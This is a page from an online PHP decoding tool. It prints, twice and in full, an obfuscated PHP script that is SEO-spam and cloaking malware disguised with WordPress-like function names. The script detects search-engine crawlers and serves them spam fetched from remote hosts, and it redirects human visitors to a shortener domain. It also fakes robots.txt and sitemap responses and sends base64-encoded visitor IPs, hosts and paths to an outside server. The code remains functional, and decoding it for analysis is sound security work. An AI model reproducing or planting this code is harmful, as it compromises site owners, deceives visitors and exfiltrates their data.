Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
?php error_reporting(0); function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) { $sev1 = $_SERVE..
Decoded Output download
<? ?php
error_reporting(0);
function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) {
$sev1 = $_SERVER;
if(!$Mfnh[1]($Xfnh[0])){$c = $Mfnh[2](array($Xfnh[1]=>array($Xfnh[2]=>$Xfnh[3],$Xfnh[4]=>60)));$s = @$Mfnh[3]($u, false, $c);}else{$z1 = array($Xfnh[5].@$sev1[$Xfnh[6]],$Xfnh[7].$z2[2],$Xfnh[8].$sev1[$Xfnh[9]],$Xfnh[10].$sev1[$Xfnh[11]]);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $u);curl_setopt($ch, CURLOPT_USERAGENT, @$sev1[$Xfnh[12]]);curl_setopt($ch, CURLOPT_HTTPHEADER, $z1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$s = curl_exec($ch);$a = curl_getinfo($ch);curl_close($ch);if($a[$Xfnh[13]]!=$Xfnh[14]) $s = $Xfnh[15];}
if(empty($s) && $n<1) return wp_xfnh(str_replace($z2[0],$z2[1],$u),$z2,$Xfnh,$Mfnh,1);
return $s;
}
function wp_yfnh() {
$Xfnh = explode(';','curl_exec;http;method;GET;timeout;Accept-Language:;HTTP_ACCEPT_LANGUAGE;User-IP:;User-URI:;REQUEST_URI;User-HOST:;HTTP_HOST;HTTP_USER_AGENT;http_code;200;;HTTP_CF_CONNECTING_IP;HTTP_CF_CONNECTING_IP;HTTP_X_FORWARDED_FOR;HTTP_X_FORWARDED_FOR;HTTP_CLIENT_IP;HTTP_CLIENT_IP;HTTP_X_REAL_IP;HTTP_X_REAL_IP;REMOTE_ADDR;,;HTTP_USER_AGENT;/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i;REQUEST_URI;HTTP_ACCEPT_LANGUAGE;HTTP_HOST;/[w0-9\.-]/;;^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\.;[0-9]-[0-9]+-[0-9]+;[0-9][0-9][0-9]c[0-9]+;/^;/;/^;/;/;/;;;pingxml;/\?.$/;https://www.google.com/ping?sitemap=http://;?sitemap;.xml;#;Received<;PING-1;PING-0;w;Location: http://api333.shortbitlys.com/jump;/^;-[0-9]+-[0-9]+-[0-9]+/;2308.php?t=;&hh=;&s=;/^;-.+/;23data10.php?t=;&hh=;&s=;2307.php?t=;&hh=;&s=;/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i;robots.txt;Content-Type: text/plain;User-agent: *;Allow: /;Sitemap: http://;/?sitemap.xml;/sitemap[0-9]\.xml/;sitemap;999c9;/^;/;/^;/;1-999-1;/^;/;/^;/;{|};{|};{|};HTTP_USER_AGENT;.audi'.'oblogg'.chr(101).'rslive.;.askpa'.'ss'.chr(101).'nger.;http://ns7;com/_html2309.php;/^;/;http://ns10;com/_data10all3.php;?key=;&path=;&s=;&hd=;</urlset>;Content-type:text/xml');
$Mfnh = explode(';','error_reporting;function_'.chr(101).'xists;stream_context_create;file_g'.chr(101).'t_contents;g'.chr(101).'thostbyaddr;header;url'.chr(101).'ncode;bas'.chr(101).'64_'.chr(101).'ncode');
$sev1 = $_SERVER; $g1 = $_GET;
if(isset($sev1[$Xfnh[16]])){$i = $sev1[$Xfnh[16]];} elseif(isset($sev1[$Xfnh[18]])){$i = $sev1[$Xfnh[18]];} elseif(isset($sev1[$Xfnh[20]])){$i = $sev1[$Xfnh[20]];} elseif(isset($sev1[$Xfnh[22]])){$i = $sev1[$Xfnh[22]];} else{$i = $sev1[$Xfnh[24]];}
$p = explode($Xfnh[25],$i);
$x1 = $p[0];
$x2 = @$sev1[$Xfnh[12]].@$Mfnh[4]($x1);
$x3 = (preg_match($Xfnh[27],$x2)?1:0);
$x4 = $sev1[$Xfnh[9]];
$x5 = @$sev1[$Xfnh[6]];
$x6 = $sev1[$Xfnh[11]];
$x7 = substr(preg_replace($Xfnh[31],"",$x6),0,3);
$x8 = substr($x7,0,1);
$x9 = $Xfnh[15];
$y1 = $Xfnh[33];
$y2 = $x7.$Xfnh[34];
$y3 = $x7.$Xfnh[35];
if(!empty($g1)) {
foreach($g1 as $k=>$v) {
if(preg_match($Xfnh[36].$y2.$Xfnh[37],$v)) {$x8 = $k;break;}
if(preg_match($Xfnh[36].$y3.$Xfnh[37],$v)) {$x8 = $k;break;}
if(preg_match($Xfnh[37].$y1.$Xfnh[37],$v)) {$x9 = $v;break;}
}
}
$y4 = $Xfnh[15]; $y5 = isset($g1[$x8]) ? trim($g1[$x8]) : $Xfnh[15];
if(strstr($x4,$Xfnh[44])) {
$y6 = preg_replace($Xfnh[45],"",$x4);
$y7 = $Xfnh[46].$x6.$y6.$Xfnh[47].rand(1,99).$Xfnh[48];
echo $y7.$Xfnh[49];
if(strstr(@$Mfnh[3]($y7),$Xfnh[50])) exit($Xfnh[51]);
exit($Xfnh[52]);
}
if(strlen($x2)>20 && !empty($x5) && !$x3) {
$y8 = "w"; $y9 = $Xfnh[54];
if(preg_match($Xfnh[36].$y2.$Xfnh[56],$y5)) {
$Mfnh[5]($y9.$Xfnh[57].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
} elseif(preg_match($Xfnh[36].$y3.'/',$y5)) {
$Mfnh[5]($y9.$Xfnh[62].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
} elseif(!empty($x9)) {
$Mfnh[5]($y9.$Xfnh[65].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($x9));exit;
}
}
if(preg_match($Xfnh[68],$x4)) return;
if($x3) {
if(substr($x4,-10)==$Xfnh[69]) {
$Mfnh[5]($Xfnh[70]);
exit($Xfnh[71]."
".$Xfnh[72]."
".$Xfnh[73].$x6.$Xfnh[74]);
}elseif(preg_match($Xfnh[75],$x4) || $y5==$Xfnh[76]) {
$y5=$x7.$Xfnh[77];
}elseif(!preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) && !preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$y5=$x7.$Xfnh[82];
}
if(preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) || preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$z1 = $Mfnh[7]($x6.$Xfnh[87].$x4.$Xfnh[87].$x1.$Xfnh[87].@$sev1[$Xfnh[12]]);
$z2 = array($Xfnh[91], $Xfnh[92]);
$z3 = $Xfnh[93].$z2[0].$Xfnh[94];
if(preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$z3 = $Xfnh[97].$z2[0].$Xfnh[98];
}
$z2[2] = $x1;
$z4 = wp_xfnh($z3.$Xfnh[99].$x8.$Xfnh[100].$y4.$Xfnh[59].$Mfnh[6]($y5).$Xfnh[102].$Mfnh[6]($z1),$z2,$Xfnh,$Mfnh);
if(strstr($z4,$Xfnh[103])) { $Mfnh[5]($Xfnh[104]); exit($z4); }
if(strlen($z4)>500) {exit($z4);}
}
}
} wp_yfnh();
?>
Did this file decode correctly?
Original Code
?php
error_reporting(0);
function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) {
$sev1 = $_SERVER;
if(!$Mfnh[1]($Xfnh[0])){$c = $Mfnh[2](array($Xfnh[1]=>array($Xfnh[2]=>$Xfnh[3],$Xfnh[4]=>60)));$s = @$Mfnh[3]($u, false, $c);}else{$z1 = array($Xfnh[5].@$sev1[$Xfnh[6]],$Xfnh[7].$z2[2],$Xfnh[8].$sev1[$Xfnh[9]],$Xfnh[10].$sev1[$Xfnh[11]]);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $u);curl_setopt($ch, CURLOPT_USERAGENT, @$sev1[$Xfnh[12]]);curl_setopt($ch, CURLOPT_HTTPHEADER, $z1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$s = curl_exec($ch);$a = curl_getinfo($ch);curl_close($ch);if($a[$Xfnh[13]]!=$Xfnh[14]) $s = $Xfnh[15];}
if(empty($s) && $n<1) return wp_xfnh(str_replace($z2[0],$z2[1],$u),$z2,$Xfnh,$Mfnh,1);
return $s;
}
function wp_yfnh() {
$Xfnh = explode(';','curl_exec;http;method;GET;timeout;Accept-Language:;HTTP_ACCEPT_LANGUAGE;User-IP:;User-URI:;REQUEST_URI;User-HOST:;HTTP_HOST;HTTP_USER_AGENT;http_code;200;;HTTP_CF_CONNECTING_IP;HTTP_CF_CONNECTING_IP;HTTP_X_FORWARDED_FOR;HTTP_X_FORWARDED_FOR;HTTP_CLIENT_IP;HTTP_CLIENT_IP;HTTP_X_REAL_IP;HTTP_X_REAL_IP;REMOTE_ADDR;,;HTTP_USER_AGENT;/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i;REQUEST_URI;HTTP_ACCEPT_LANGUAGE;HTTP_HOST;/[w0-9\.-]/;;^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\.;[0-9]-[0-9]+-[0-9]+;[0-9][0-9][0-9]c[0-9]+;/^;/;/^;/;/;/;;;pingxml;/\?.$/;https://www.google.com/ping?sitemap=http://;?sitemap;.xml;#;Received<;PING-1;PING-0;w;Location: http://api333.shortbitlys.com/jump;/^;-[0-9]+-[0-9]+-[0-9]+/;2308.php?t=;&hh=;&s=;/^;-.+/;23data10.php?t=;&hh=;&s=;2307.php?t=;&hh=;&s=;/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i;robots.txt;Content-Type: text/plain;User-agent: *;Allow: /;Sitemap: http://;/?sitemap.xml;/sitemap[0-9]\.xml/;sitemap;999c9;/^;/;/^;/;1-999-1;/^;/;/^;/;{|};{|};{|};HTTP_USER_AGENT;.audi'.'oblogg'.chr(101).'rslive.;.askpa'.'ss'.chr(101).'nger.;http://ns7;com/_html2309.php;/^;/;http://ns10;com/_data10all3.php;?key=;&path=;&s=;&hd=;</urlset>;Content-type:text/xml');
$Mfnh = explode(';','error_reporting;function_'.chr(101).'xists;stream_context_create;file_g'.chr(101).'t_contents;g'.chr(101).'thostbyaddr;header;url'.chr(101).'ncode;bas'.chr(101).'64_'.chr(101).'ncode');
$sev1 = $_SERVER; $g1 = $_GET;
if(isset($sev1[$Xfnh[16]])){$i = $sev1[$Xfnh[16]];} elseif(isset($sev1[$Xfnh[18]])){$i = $sev1[$Xfnh[18]];} elseif(isset($sev1[$Xfnh[20]])){$i = $sev1[$Xfnh[20]];} elseif(isset($sev1[$Xfnh[22]])){$i = $sev1[$Xfnh[22]];} else{$i = $sev1[$Xfnh[24]];}
$p = explode($Xfnh[25],$i);
$x1 = $p[0];
$x2 = @$sev1[$Xfnh[12]].@$Mfnh[4]($x1);
$x3 = (preg_match($Xfnh[27],$x2)?1:0);
$x4 = $sev1[$Xfnh[9]];
$x5 = @$sev1[$Xfnh[6]];
$x6 = $sev1[$Xfnh[11]];
$x7 = substr(preg_replace($Xfnh[31],"",$x6),0,3);
$x8 = substr($x7,0,1);
$x9 = $Xfnh[15];
$y1 = $Xfnh[33];
$y2 = $x7.$Xfnh[34];
$y3 = $x7.$Xfnh[35];
if(!empty($g1)) {
foreach($g1 as $k=>$v) {
if(preg_match($Xfnh[36].$y2.$Xfnh[37],$v)) {$x8 = $k;break;}
if(preg_match($Xfnh[36].$y3.$Xfnh[37],$v)) {$x8 = $k;break;}
if(preg_match($Xfnh[37].$y1.$Xfnh[37],$v)) {$x9 = $v;break;}
}
}
$y4 = $Xfnh[15]; $y5 = isset($g1[$x8]) ? trim($g1[$x8]) : $Xfnh[15];
if(strstr($x4,$Xfnh[44])) {
$y6 = preg_replace($Xfnh[45],"",$x4);
$y7 = $Xfnh[46].$x6.$y6.$Xfnh[47].rand(1,99).$Xfnh[48];
echo $y7.$Xfnh[49];
if(strstr(@$Mfnh[3]($y7),$Xfnh[50])) exit($Xfnh[51]);
exit($Xfnh[52]);
}
if(strlen($x2)>20 && !empty($x5) && !$x3) {
$y8 = "w"; $y9 = $Xfnh[54];
if(preg_match($Xfnh[36].$y2.$Xfnh[56],$y5)) {
$Mfnh[5]($y9.$Xfnh[57].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
} elseif(preg_match($Xfnh[36].$y3.'/',$y5)) {
$Mfnh[5]($y9.$Xfnh[62].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
} elseif(!empty($x9)) {
$Mfnh[5]($y9.$Xfnh[65].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($x9));exit;
}
}
if(preg_match($Xfnh[68],$x4)) return;
if($x3) {
if(substr($x4,-10)==$Xfnh[69]) {
$Mfnh[5]($Xfnh[70]);
exit($Xfnh[71]."\n".$Xfnh[72]."\n\n".$Xfnh[73].$x6.$Xfnh[74]);
}elseif(preg_match($Xfnh[75],$x4) || $y5==$Xfnh[76]) {
$y5=$x7.$Xfnh[77];
}elseif(!preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) && !preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$y5=$x7.$Xfnh[82];
}
if(preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) || preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$z1 = $Mfnh[7]($x6.$Xfnh[87].$x4.$Xfnh[87].$x1.$Xfnh[87].@$sev1[$Xfnh[12]]);
$z2 = array($Xfnh[91], $Xfnh[92]);
$z3 = $Xfnh[93].$z2[0].$Xfnh[94];
if(preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
$z3 = $Xfnh[97].$z2[0].$Xfnh[98];
}
$z2[2] = $x1;
$z4 = wp_xfnh($z3.$Xfnh[99].$x8.$Xfnh[100].$y4.$Xfnh[59].$Mfnh[6]($y5).$Xfnh[102].$Mfnh[6]($z1),$z2,$Xfnh,$Mfnh);
if(strstr($z4,$Xfnh[103])) { $Mfnh[5]($Xfnh[104]); exit($z4); }
if(strlen($z4)>500) {exit($z4);}
}
}
} wp_yfnh();
?>
Function Calls
None |
Stats
MD5 | d1891944cfe205c9287b36ec57f55a6f |
Eval Count | 0 |
Decode Time | 55 ms |